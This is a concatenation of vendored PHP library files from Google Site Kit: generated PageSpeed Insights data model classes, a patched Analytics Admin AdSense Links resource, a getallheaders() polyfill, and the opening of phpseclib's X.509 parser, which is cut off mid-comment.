\class_alias(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\RendererFormattedStrings::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PagespeedInsights_RendererFormattedStrings'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights; class Timing extends \Google\Site_Kit_Dependencies\Google\Model { public $total; public function setTotal($total) { $this->total = $total; } public function getTotal() { return $this->total; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\Timing::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PagespeedInsights_Timing'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights; class LighthouseCategoryV5 extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'auditRefs'; protected $auditRefsType = \Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\AuditRefs::class; protected $auditRefsDataType = 'array'; /** * @var string */ public $description; /** * @var string */ public $id; /** * @var string */ public $manualDescription; /** * @var array */ public $score; /** * @var string */ public $title; /** * @param AuditRefs[] */ public function setAuditRefs($auditRefs) { $this->auditRefs = $auditRefs; } /** * @return AuditRefs[] */ public function getAuditRefs() { return $this->auditRefs; } /** * @param string */ public function setDescription($description) { $this->description = $description; } /** * @return string */ public function getDescription() { return $this->description; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setManualDescription($manualDescription) { $this->manualDescription = $manualDescription; } /** * @return string */ public function getManualDescription() { return $this->manualDescription; } /** * @param array */ public function setScore($score) { $this->score = $score; } /** * @return array */ public function getScore() { return $this->score; } /** * @param string */ public function setTitle($title) { $this->title = $title; } /** * @return string */ public function getTitle() { return $this->title; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\LighthouseCategoryV5::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PagespeedInsights_LighthouseCategoryV5'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights; class LighthouseAuditResultV5 extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $description; /** * @var array[] */ public $details; /** * @var string */ public $displayValue; /** * @var string */ public $errorMessage; /** * @var string */ public $explanation; /** * @var string */ public $id; /** * @var string */ public $numericUnit; public $numericValue; /** * @var array */ public $score; /** * @var string */ public $scoreDisplayMode; /** * @var string */ public $title; /** * @var array */ public $warnings; /** * @param string */ public function setDescription($description) { $this->description = $description; } /** * @return string */ public function getDescription() { return $this->description; } /** * @param array[] */ public function setDetails($details) { $this->details = $details; } /** * @return array[] */ public function getDetails() { return $this->details; } /** * @param string */ public function setDisplayValue($displayValue) { $this->displayValue = $displayValue; } /** * @return string */ public function getDisplayValue() { return $this->displayValue; } /** * @param string */ public function setErrorMessage($errorMessage) { $this->errorMessage = $errorMessage; } /** * @return string */ public function getErrorMessage() { return $this->errorMessage; } /** * @param string */ public function setExplanation($explanation) { $this->explanation = $explanation; } /** * @return string */ public function getExplanation() { return $this->explanation; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setNumericUnit($numericUnit) { $this->numericUnit = $numericUnit; } /** * @return string */ public function getNumericUnit() { return $this->numericUnit; } public function setNumericValue($numericValue) { $this->numericValue = $numericValue; } public function getNumericValue() { return $this->numericValue; } /** * @param array */ public function setScore($score) { $this->score = $score; } /** * @return array */ public function getScore() { return $this->score; } /** * @param string */ public function setScoreDisplayMode($scoreDisplayMode) { $this->scoreDisplayMode = $scoreDisplayMode; } /** * @return string */ public function getScoreDisplayMode() { return $this->scoreDisplayMode; } /** * @param string */ public function setTitle($title) { $this->title = $title; } /** * @return string */ public function getTitle() { return $this->title; } /** * @param array */ public function setWarnings($warnings) { $this->warnings = $warnings; } /** * @return array */ public function getWarnings() { return $this->warnings; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\LighthouseAuditResultV5::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PagespeedInsights_LighthouseAuditResultV5'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights; class PagespeedApiLoadingExperienceV5 extends \Google\Site_Kit_Dependencies\Google\Model { protected $internal_gapi_mappings = ["initialUrl" => "initial_url", "originFallback" => "origin_fallback", "overallCategory" => "overall_category"]; /** * @var string */ public $id; /** * @var string */ public $initialUrl; protected $metricsType = \Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\UserPageLoadMetricV5::class; protected $metricsDataType = 'map'; /** * @var bool */ public $originFallback; /** * @var string */ public $overallCategory; /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setInitialUrl($initialUrl) { $this->initialUrl = $initialUrl; } /** * @return string */ public function getInitialUrl() { return $this->initialUrl; } /** * @param UserPageLoadMetricV5[] */ public function setMetrics($metrics) { $this->metrics = $metrics; } /** * @return UserPageLoadMetricV5[] */ public function getMetrics() { return $this->metrics; } /** * @param bool */ public function setOriginFallback($originFallback) { $this->originFallback = $originFallback; } /** * @return bool */ public function getOriginFallback() { return $this->originFallback; } /** * @param string */ public function setOverallCategory($overallCategory) { $this->overallCategory = $overallCategory; } /** * @return string */ public function getOverallCategory() { return $this->overallCategory; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\PagespeedApiLoadingExperienceV5::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PagespeedInsights_PagespeedApiLoadingExperienceV5'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights; class UserPageLoadMetricV5 extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'distributions'; /** * @var string */ public $category; protected $distributionsType = \Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\Bucket::class; protected $distributionsDataType = 'array'; /** * @var string */ public $formFactor; /** * @var int */ public $median; /** * @var string */ public $metricId; /** * @var int */ public $percentile; /** * @param string */ public function setCategory($category) { $this->category = $category; } /** * @return string */ public function getCategory() { return $this->category; } /** * @param Bucket[] */ public function setDistributions($distributions) { $this->distributions = $distributions; } /** * @return Bucket[] */ public function getDistributions() { return $this->distributions; } /** * @param string */ public function setFormFactor($formFactor) { $this->formFactor = $formFactor; } /** * @return string */ public function getFormFactor() { return $this->formFactor; } /** * @param int */ public function setMedian($median) { $this->median = $median; } /** * @return int */ public function getMedian() { return $this->median; } /** * @param string */ public function setMetricId($metricId) { $this->metricId = $metricId; } /** * @return string */ public function getMetricId() { return $this->metricId; } /** * @param int */ public function setPercentile($percentile) { $this->percentile = $percentile; } /** * @return int */ public function getPercentile() { return $this->percentile; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\UserPageLoadMetricV5::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PagespeedInsights_UserPageLoadMetricV5'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights; class StackPack extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string[] */ public $descriptions; /** * @var string */ public $iconDataURL; /** * @var string */ public $id; /** * @var string */ public $title; /** * @param string[] */ public function setDescriptions($descriptions) { $this->descriptions = $descriptions; } /** * @return string[] */ public function getDescriptions() { return $this->descriptions; } /** * @param string */ public function setIconDataURL($iconDataURL) { $this->iconDataURL = $iconDataURL; } /** * @return string */ public function getIconDataURL() { return $this->iconDataURL; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setTitle($title) { $this->title = $title; } /** * @return string */ public function getTitle() { return $this->title; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\StackPack::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PagespeedInsights_StackPack'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\Resource; use Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\PagespeedApiPagespeedResponseV5; /** * The "pagespeedapi" collection of methods. * Typical usage is: * <code> * $pagespeedonlineService = new Google\Service\PagespeedInsights(...); * $pagespeedapi = $pagespeedonlineService->pagespeedapi; * </code> */ class Pagespeedapi extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Runs PageSpeed analysis on the page at the specified URL, and returns * PageSpeed scores, a list of suggestions to make that page faster, and other * information. (pagespeedapi.runpagespeed) * * @param string $url Required. The URL to fetch and analyze * @param array $optParams Optional parameters. * * @opt_param string captchaToken The captcha token passed when filling out a * captcha. * @opt_param string category A Lighthouse category to run; if none are given, * only Performance category will be run * @opt_param string locale The locale used to localize formatted results * @opt_param string strategy The analysis strategy (desktop or mobile) to use, * and desktop is the default * @opt_param string utm_campaign Campaign name for analytics. * @opt_param string utm_source Campaign source for analytics. * @return PagespeedApiPagespeedResponseV5 * @throws \Google\Service\Exception */ public function runpagespeed($url, $optParams = []) { $params = ['url' => $url]; $params = \array_merge($params, $optParams); return $this->call('runpagespeed', [$params], \Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\PagespeedApiPagespeedResponseV5::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\Resource\Pagespeedapi::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PagespeedInsights_Resource_Pagespeedapi'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights; class Environment extends \Google\Site_Kit_Dependencies\Google\Model { public $benchmarkIndex; /** * @var string[] */ public $credits; /** * @var string */ public $hostUserAgent; /** * @var string */ public $networkUserAgent; public function setBenchmarkIndex($benchmarkIndex) { $this->benchmarkIndex = $benchmarkIndex; } public function getBenchmarkIndex() { return $this->benchmarkIndex; } /** * @param string[] */ public function setCredits($credits) { $this->credits = $credits; } /** * @return string[] */ public function getCredits() { return $this->credits; } /** * @param string */ public function setHostUserAgent($hostUserAgent) { $this->hostUserAgent = $hostUserAgent; } /** * @return string */ public function getHostUserAgent() { return $this->hostUserAgent; } /** * @param string */ public function setNetworkUserAgent($networkUserAgent) { $this->networkUserAgent = $networkUserAgent; } /** * @return string */ public function getNetworkUserAgent() { return $this->networkUserAgent; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\Environment::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PagespeedInsights_Environment'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights; class Bucket extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var int */ public $max; /** * @var int */ public $min; public $proportion; /** * @param int */ public function setMax($max) { $this->max = $max; } /** * @return int */ public function getMax() { return $this->max; } /** * @param int */ public function setMin($min) { $this->min = $min; } /** * @return int */ public function getMin() { return $this->min; } public function setProportion($proportion) { $this->proportion = $proportion; } public function getProportion() { return $this->proportion; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\Bucket::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PagespeedInsights_Bucket'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights; class RuntimeError extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $code; /** * @var string */ public $message; /** * @param string */ public function setCode($code) { $this->code = $code; } /** * @return string */ public function getCode() { return $this->code; } /** * @param string */ public function setMessage($message) { $this->message = $message; } /** * @return string */ public function getMessage() { return $this->message; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\RuntimeError::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PagespeedInsights_RuntimeError'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights; class LighthouseResultV5 extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'stackPacks'; protected $auditsType = \Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\LighthouseAuditResultV5::class; protected $auditsDataType = 'map'; protected $categoriesType = \Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\Categories::class; protected $categoriesDataType = ''; protected $categoryGroupsType = \Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\CategoryGroupV5::class; protected $categoryGroupsDataType = 'map'; protected $configSettingsType = \Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\ConfigSettings::class; protected $configSettingsDataType = ''; protected $entitiesType = \Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\LhrEntity::class; protected $entitiesDataType = 'array'; protected $environmentType = \Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\Environment::class; protected $environmentDataType = ''; /** * @var string */ public $fetchTime; /** * @var string */ public $finalDisplayedUrl; /** * @var string */ public $finalUrl; /** * @var array */ public $fullPageScreenshot; protected $i18nType = \Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\I18n::class; protected $i18nDataType = ''; /** * @var string */ public $lighthouseVersion; /** * @var string */ public $mainDocumentUrl; /** * @var string */ public $requestedUrl; /** * @var array[] */ public $runWarnings; protected $runtimeErrorType = \Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\RuntimeError::class; protected $runtimeErrorDataType = ''; protected $stackPacksType = \Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\StackPack::class; protected $stackPacksDataType = 'array'; protected $timingType = \Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\Timing::class; protected $timingDataType = ''; /** * @var string */ public $userAgent; /** * @param LighthouseAuditResultV5[] */ public function setAudits($audits) { $this->audits = $audits; } /** * @return LighthouseAuditResultV5[] */ public function getAudits() { return $this->audits; } /** * @param Categories */ public function setCategories(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\Categories $categories) { $this->categories = $categories; } /** * @return Categories */ public function getCategories() { return $this->categories; } /** * @param CategoryGroupV5[] */ public function setCategoryGroups($categoryGroups) { $this->categoryGroups = $categoryGroups; } /** * @return CategoryGroupV5[] */ public function getCategoryGroups() { return $this->categoryGroups; } /** * @param ConfigSettings */ public function setConfigSettings(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\ConfigSettings $configSettings) { $this->configSettings = $configSettings; } /** * @return ConfigSettings */ public function getConfigSettings() { return $this->configSettings; } /** * @param LhrEntity[] */ public function setEntities($entities) { $this->entities = $entities; } /** * @return LhrEntity[] */ public function getEntities() { return $this->entities; } /** * @param Environment */ public function setEnvironment(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\Environment $environment) { $this->environment = $environment; } /** * @return Environment */ public function getEnvironment() { return $this->environment; } /** * @param string */ public function setFetchTime($fetchTime) { $this->fetchTime = $fetchTime; } /** * @return string */ public function getFetchTime() { return $this->fetchTime; } /** * @param string */ public function setFinalDisplayedUrl($finalDisplayedUrl) { $this->finalDisplayedUrl = $finalDisplayedUrl; } /** * @return string */ public function getFinalDisplayedUrl() { return $this->finalDisplayedUrl; } /** * @param string */ public function setFinalUrl($finalUrl) { $this->finalUrl = $finalUrl; } /** * @return string */ public function getFinalUrl() { return $this->finalUrl; } /** * @param array */ public function setFullPageScreenshot($fullPageScreenshot) { $this->fullPageScreenshot = $fullPageScreenshot; } /** * @return array */ public function getFullPageScreenshot() { return $this->fullPageScreenshot; } /** * @param I18n */ public function setI18n(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\I18n $i18n) { $this->i18n = $i18n; } /** * @return I18n */ public function getI18n() { return $this->i18n; } /** * @param string */ public function setLighthouseVersion($lighthouseVersion) { $this->lighthouseVersion = $lighthouseVersion; } /** * @return string */ public function getLighthouseVersion() { return $this->lighthouseVersion; } /** * @param string */ public function setMainDocumentUrl($mainDocumentUrl) { $this->mainDocumentUrl = $mainDocumentUrl; } /** * @return string */ public function getMainDocumentUrl() { return $this->mainDocumentUrl; } /** * @param string */ public function setRequestedUrl($requestedUrl) { $this->requestedUrl = $requestedUrl; } /** * @return string */ public function getRequestedUrl() { return $this->requestedUrl; } /** * @param array[] */ public function setRunWarnings($runWarnings) { $this->runWarnings = $runWarnings; } /** * @return array[] */ public function getRunWarnings() { return $this->runWarnings; } /** * @param RuntimeError */ public function setRuntimeError(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\RuntimeError $runtimeError) { $this->runtimeError = $runtimeError; } /** * @return RuntimeError */ public function getRuntimeError() { return $this->runtimeError; } /** * @param StackPack[] */ public function setStackPacks($stackPacks) { $this->stackPacks = $stackPacks; } /** * @return StackPack[] */ public function getStackPacks() { return $this->stackPacks; } /** * @param Timing */ public function setTiming(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\Timing $timing) { $this->timing = $timing; } /** * @return Timing */ public function getTiming() { return $this->timing; } /** * @param string */ public function setUserAgent($userAgent) { $this->userAgent = $userAgent; } /** * @return string */ public function getUserAgent() { return $this->userAgent; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\LighthouseResultV5::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PagespeedInsights_LighthouseResultV5'); This file was automatically generated by Composer Patches (https://github.com/cweagans/composer-patches) Patches applied to this directory: Fixes for empty filter Source: patches-composer/google-api-client-services-v0.355.0.patch <?php namespace Google\Site_Kit_Dependencies; /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ /** * The "adSenseLinks" collection of methods. * Typical usage is: * <code> * $analyticsadminService = new Google_Service_GoogleAnalyticsAdmin(...); * $adSenseLinks = $analyticsadminService->adSenseLinks; * </code> */ class Google_Service_GoogleAnalyticsAdmin_PropertiesAdSenseLinks_Resource extends \Google\Site_Kit_Dependencies\Google_Service_Resource { /** * Creates an AdSenseLink. (adSenseLinks.create) * * @param string $parent Required. The property for which to create an AdSense * Link. Format: properties/{propertyId} Example: properties/1234 * @param Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAdSenseLink $postBody * @param array $optParams Optional parameters. * @return Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAdSenseLink */ public function create($parent, \Google\Site_Kit_Dependencies\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAdSenseLink $postBody, $optParams = array()) { $params = array('parent' => $parent, 'postBody' => $postBody); $params = \array_merge($params, $optParams); return $this->call('create', array($params), Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAdSenseLink::class); } /** * Deletes an AdSenseLink. (adSenseLinks.delete) * * @param string $name Required. Unique identifier for the AdSense Link to be * deleted. Format: properties/{propertyId}/adSenseLinks/{linkId} Example: * properties/1234/adSenseLinks/5678 * @param array $optParams Optional parameters. * @return Google_Service_GoogleAnalyticsAdmin_GoogleProtobufEmpty */ public function delete($name, $optParams = array()) { $params = array('name' => $name); $params = \array_merge($params, $optParams); return $this->call('delete', array($params), Google_Service_GoogleAnalyticsAdmin_GoogleProtobufEmpty::class); } /** * Looks up a single AdSenseLink. (adSenseLinks.get) * * @param string $name Required. Unique identifier for the AdSense Link * requested. Format: properties/{propertyId}/adSenseLinks/{linkId} Example: * properties/1234/adSenseLinks/5678 * @param array $optParams Optional parameters. * @return Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAdSenseLink */ public function get($name, $optParams = array()) { $params = array('name' => $name); $params = \array_merge($params, $optParams); return $this->call('get', array($params), Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAdSenseLink::class); } /** * Lists AdSenseLinks on a property. (adSenseLinks.listPropertiesAdSenseLinks) * * @param string $parent Required. Resource name of the parent property. Format: * properties/{propertyId} Example: properties/1234 * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of resources to return. If * unspecified, at most 50 resources will be returned. The maximum value is 200 * (higher values will be coerced to the maximum). * @opt_param string pageToken A page token received from a previous * `ListAdSenseLinks` call. Provide this to retrieve the subsequent page. When * paginating, all other parameters provided to `ListAdSenseLinks` must match * the call that provided the page token. * @return Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaListAdSenseLinksResponse */ public function listPropertiesAdSenseLinks($parent, $optParams = array()) { $params = array('parent' => $parent); $params = \array_merge($params, $optParams); return $this->call('list', array($params), Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaListAdSenseLinksResponse::class); } } class Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAdSenseLink extends \Google\Site_Kit_Dependencies\Google_Model { protected $internal_gapi_mappings = array(); public $adClientCode; public $name; public function setAdClientCode($adClientCode) { $this->adClientCode = $adClientCode; } public function getAdClientCode() { return $this->adClientCode; } public function setName($name) { $this->name = $name; } public function getName() { return $this->name; } } class Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaListAdSenseLinksResponse extends \Google\Site_Kit_Dependencies\Google_Collection { protected $collection_key = 'adsenseLinks'; protected $internal_gapi_mappings = array(); protected $adsenseLinksType = 'Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAdSenseLink'; protected $adsenseLinksDataType = 'array'; public $adsenseLinks; public $nextPageToken; public function setAdsenseLinks($adsenseLinks) { $this->adsenseLinks = $adsenseLinks; } public function getAdsenseLinks() { return $this->adsenseLinks; } public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } public function getNextPageToken() { return $this->nextPageToken; } } class Google_Service_GoogleAnalyticsAdmin_GoogleProtobufEmpty extends \Google\Site_Kit_Dependencies\Google_Model { } <?php if (!function_exists('getallheaders')) { /** * Get all HTTP header key/values as an associative array for the current request. * * @return string[string] The HTTP header key/value pairs. */ function getallheaders() { $headers = array(); $copy_server = array( 'CONTENT_TYPE' => 'Content-Type', 'CONTENT_LENGTH' => 'Content-Length', 'CONTENT_MD5' => 'Content-Md5', ); foreach ($_SERVER as $key => $value) { if (substr($key, 0, 5) === 'HTTP_') { $key = substr($key, 5); if (!isset($copy_server[$key]) || !isset($_SERVER[$key])) { $key = str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', $key)))); $headers[$key] = $value; } } elseif (isset($copy_server[$key])) { $headers[$copy_server[$key]] = $value; } } if (!isset($headers['Authorization'])) { if (isset($_SERVER['REDIRECT_HTTP_AUTHORIZATION'])) { $headers['Authorization'] = $_SERVER['REDIRECT_HTTP_AUTHORIZATION']; } elseif (isset($_SERVER['PHP_AUTH_USER'])) { $basic_pass = isset($_SERVER['PHP_AUTH_PW']) ? $_SERVER['PHP_AUTH_PW'] : ''; $headers['Authorization'] = 'Basic ' . base64_encode($_SERVER['PHP_AUTH_USER'] . ':' . $basic_pass); } elseif (isset($_SERVER['PHP_AUTH_DIGEST'])) { $headers['Authorization'] = $_SERVER['PHP_AUTH_DIGEST']; } } return $headers; } } <?php /** * Pure-PHP X.509 Parser * * PHP version 5 * * Encode and decode X.509 certificates. * * The extensions are from {@link http://tools.ietf.org/html/rfc5280 RFC5280} and * {@link http://web.archive.org/web/19961027104704/http://www3.netscape.com/eng/security/cert-exts.html Netscape Certificate Extensions}. * * Note that loading an X.509 certificate and resaving it may invalidate the signature. The reason being that the signature is based on a * portion of the certificate that contains optional parameters with default values. ie. if the parameter isn't there the default value is * used. Problem is, if the parameter is there and it just so happens to have the default value there are two ways that that parameter can * be encoded. It can be encoded explicitly or left out all together. This would effect the signature value and thus may invalidate the * the certificate all together unless the certificate is re-signed. * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2012 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\File; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PrivateKey; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PublicKey; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\PublicKeyLoader; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys\PSS; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedAlgorithmException; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Element; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * Pure-PHP X.509 Parser * * @author Jim Wigginton <terrafrost@php.net> */ class X509 { /** * Flag to only accept 